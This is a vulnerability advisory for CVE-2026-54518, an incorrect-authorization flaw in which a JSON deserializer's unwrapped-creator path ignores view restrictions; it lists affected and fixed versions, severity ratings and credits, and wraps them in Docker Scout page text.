CVE-2026-54518

ADVISORY - github

Summary

UnwrappedPropertyHandler.processUnwrappedCreatorProperties() replays buffered JSON into creator parameters but never consults prop.visibleInView(activeView). The normal property-based creator path gates creator properties on the active view, but this unwrapped-creator replay path bypasses that check, so a constructor parameter annotated with both @JsonView(AdminView.class) and @JsonUnwrapped is populated from attacker JSON even when a more restrictive view is active.

Impact

View-restricted unwrapped creator parameters can be set from untrusted input where @JsonView is used as a write-side authorization boundary.

Affected / Patched (verified via `git tag --contains`)

2.21 line: >= 2.21.0, < 2.21.4 -> fixed in 2.21.4 (backport 721fa07, #5973)
3.x line: >= 3.0.0, < 3.1.4 -> fixed in 3.1.4 (#5971, d633bc0)

Severity / CWE

Maintainer: minor. Reporter: HIGH. CWE-863 (Incorrect Authorization); related CWE-284.

Credits

Omkhar Arasaratnam (@omkhar) - finder.

Common Weakness Enumeration (CWE)

ADVISORY - github

CWE-863⁠

Incorrect Authorization

Impacted images

Advisories

Sign in to Docker Scout

See which of your images are affected by this CVE and how to fix them by signing into Docker Scout.

CVE-2026-54518

Summary

Summary

Impact

Affected / Patched (verified via git tag --contains)

Severity / CWE

Credits

Common Weakness Enumeration (CWE)

CWE-863⁠

Impacted images

Sign in to Docker Scout

Affected / Patched (verified via `git tag --contains`)